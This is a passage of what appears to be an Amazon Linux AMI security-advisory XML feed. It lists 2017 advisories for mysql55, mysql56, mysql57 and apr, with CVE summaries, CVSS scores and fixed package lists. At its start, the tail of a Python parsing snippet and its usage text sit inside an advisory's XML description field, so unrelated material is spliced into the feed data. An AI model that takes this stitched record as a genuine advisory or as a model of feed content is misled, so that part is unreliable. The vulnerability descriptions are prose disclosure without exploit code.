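        ET.SubElement(pkg, "filename").text = f"Packages/{name}-4.9.62-21.56.amzn1.{arch}.rpm"
    return ET.tostring(updates)
```

Usage: parse_updateinfo(open(path, "rb").read()) reads a real feed; needs_update("kernel-4.9.58-18.55.amzn1.x86_64", advisories["ALAS-2017-925"]) returns the fixing kernel tuple, while an installed 4.9.62-21.56.amzn1 or anything newer returns None. The epoch is recorded as a separate attribute on every package element and is compared before the version strings, since a higher epoch wins regardless of version, which is exactly the case a naive string comparison gets wrong.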
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000255" title="" id="CVE-2017-1000255" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12190" title="" id="CVE-2017-12190" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12193" title="" id="CVE-2017-12193" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15299" title="" id="CVE-2017-15299" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15951" title="" id="CVE-2017-15951" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.9.62" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.62" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.62" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.62" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.62" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.62" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.62" release="21.56.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.62" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.62" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.62" release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.62-21.56.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.62-21.56.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.62-21.56.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.62-21.56.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.62-21.56.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.62-21.56.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.62-21.56.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.62-21.56.amzn1.i686.rpm</filename></package><package 
name="kernel-tools" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.62-21.56.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.62-21.56.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.62" release="21.56.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.62-21.56.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-926</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-926: important priority package update for mysql56 mysql57</title><issued date="2017-12-05 21:50:00" /><updated date="2017-12-06 21:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-10384:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.57 and earlier, 5.6.37 and earlier and 5.7.19 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1503686:
CVE-2017-10384 mysql: Server: DDL unspecified vulnerability (CPU Oct 2017)
CVE-2017-10379:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.57 and earlier, 5.6.37 and earlier and 5.7.19 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data. CVSS 3.0 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).
1503685:
CVE-2017-10379 mysql: Client programs unspecified vulnerability (CPU Oct 2017)
CVE-2017-10378:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.57 and earlier, 5.6.37 and earlier and 5.7.11 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1503684:
CVE-2017-10378 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2017)
CVE-2017-10314:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Memcached). Supported versions that are affected are 5.6.37 and earlier and 5.7.19 and earlier. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1503679:
CVE-2017-10314 mysql: Server: Memcached unspecified vulnerability (CPU Oct 2017)
CVE-2017-10294:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.6.37 and earlier and 5.7.19 and earlier. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1503671:
CVE-2017-10294 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2017)
CVE-2017-10286:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: InnoDB). Supported versions that are affected are 5.6.37 and earlier and 5.7.19 and earlier. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1503669:
CVE-2017-10286 mysql: Server: InnoDB unspecified vulnerability (CPU Oct 2017)
CVE-2017-10283:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Performance Schema). Supported versions that are affected are 5.6.37 and earlier and 5.7.19 and earlier. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H).
1503664:
CVE-2017-10283 mysql: Server: Performance Schema unspecified vulnerability (CPU Oct 2017)
CVE-2017-10279:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.6.36 and earlier and 5.7.18 and earlier. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1503663:
CVE-2017-10279 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2017)
CVE-2017-10276:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: FTS). Supported versions that are affected are 5.6.37 and earlier and 5.7.19 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1503659:
CVE-2017-10276 mysql: Server: FTS unspecified vulnerability (CPU Oct 2017)
CVE-2017-10268:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.5.57 and earlier, 5.6.37 and earlier and 5.7.19 and earlier. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data. CVSS 3.0 Base Score 4.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N).
1503656:
CVE-2017-10268 mysql: Server: Replication unspecified vulnerability (CPU Oct 2017)
CVE-2017-10227:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.6.37 and earlier and 5.7.19 and earlier. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1503654:
CVE-2017-10227 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2017)
CVE-2017-10155:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Pluggable Auth). Supported versions that are affected are 5.6.37 and earlier and 5.7.19 and earlier. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
1503649:
CVE-2017-10155 mysql: Server: Pluggable Auth unspecified vulnerability (CPU Oct 2017)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10155" title="" id="CVE-2017-10155" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10227" title="" id="CVE-2017-10227" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10268" title="" id="CVE-2017-10268" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10276" title="" id="CVE-2017-10276" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10279" title="" id="CVE-2017-10279" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10283" title="" id="CVE-2017-10283" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10286" title="" id="CVE-2017-10286" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10294" title="" id="CVE-2017-10294" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10314" title="" id="CVE-2017-10314" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10378" title="" id="CVE-2017-10378" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10379" title="" id="CVE-2017-10379" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10384" title="" id="CVE-2017-10384" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-bench" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.38" release="1.27.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql56-embedded-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.38" release="1.27.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql56-bench-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package 
name="mysql57-embedded" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.20" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.20-2.5.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.20" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.20-2.5.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.20" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.20-2.5.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.20" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.20-2.5.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.20" release="2.5.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql57-devel-5.7.20-2.5.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.20" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.20-2.5.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.20" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.20-2.5.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.20" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.20-2.5.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.20" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.20-2.5.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.20" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.20-2.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-927</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-927: medium priority package update for mysql55</title><issued date="2017-12-05 21:54:00" /><updated date="2017-12-06 21:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-10384:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.57 and earlier, 5.6.37 and earlier and 5.7.19 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1503686:
CVE-2017-10384 mysql: Server: DDL unspecified vulnerability (CPU Oct 2017)
CVE-2017-10379:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.57 and earlier, 5.6.37 and earlier and 5.7.19 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data. CVSS 3.0 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).
1503685:
CVE-2017-10379 mysql: Client programs unspecified vulnerability (CPU Oct 2017)
CVE-2017-10378:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.57 and earlier, 5.6.37 and earlier and 5.7.11 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1503684:
CVE-2017-10378 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2017)
CVE-2017-10268:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.5.57 and earlier, 5.6.37 and earlier and 5.7.19 and earlier. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data. CVSS 3.0 Base Score 4.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N).
1503656:
CVE-2017-10268 mysql: Server: Replication unspecified vulnerability (CPU Oct 2017)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10268" title="" id="CVE-2017-10268" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10378" title="" id="CVE-2017-10378" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10379" title="" id="CVE-2017-10379" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10384" title="" id="CVE-2017-10384" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55-test" version="5.5.58" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.58" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.58" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.58" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.58" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.58" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.58" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.58" release="1.19.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql-config-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.58" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.58" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.58-1.19.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.58-1.19.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.58-1.19.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.58-1.19.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.58-1.19.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.58-1.19.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.58-1.19.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.58-1.19.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.58-1.19.amzn1.i686.rpm</filename></package><package 
name="mysql55-devel" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.58-1.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-928</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-928: important priority package update for apr</title><issued date="2017-12-05 21:57:00" /><updated date="2017-12-06 21:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12613:
An out-of-bounds array dereference was found in apr_time_exp_get(). An attacker could abuse an unvalidated usage of this function to cause a denial of service or potentially leak data.
1506523:
CVE-2017-12613 apr: Out-of-bounds array deref in apr_time_exp*() functions
